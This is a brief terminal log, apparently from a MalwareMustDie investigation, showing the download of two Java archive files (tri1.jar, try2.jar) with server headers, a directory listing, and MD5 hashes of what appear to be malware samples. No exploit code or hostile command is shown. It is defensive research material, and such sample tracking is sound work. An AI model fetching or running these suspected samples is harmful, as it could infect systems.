X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 22600
ETag: "2af29d21c006b5c106bd7760f19a2bf5"
Last-Modified: Wed, 16 Jan 2013 08:05:58 GMT
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 22,600 (22K) [application/java-archive]
"17:06:03 (42.76 KB/s) - `try2.jar' saved [22600/22600]"
 
// two jars were downloaded successfully
 
bash-2.02$ date
Tue Jan 15 23:14:51  2013
 
2013/01/16  16:24            16,786 tri1.jar
2013/01/16  17:05            22,600 try2.jar
               2 File(s)         39,386 bytes
 
tri1.jar    e3ffc7e6bc6f654d51dd5bb7658ae853
try2.jar    2af29d21c006b5c106bd7760f19a2bf5
 :
#MalwareMustDie!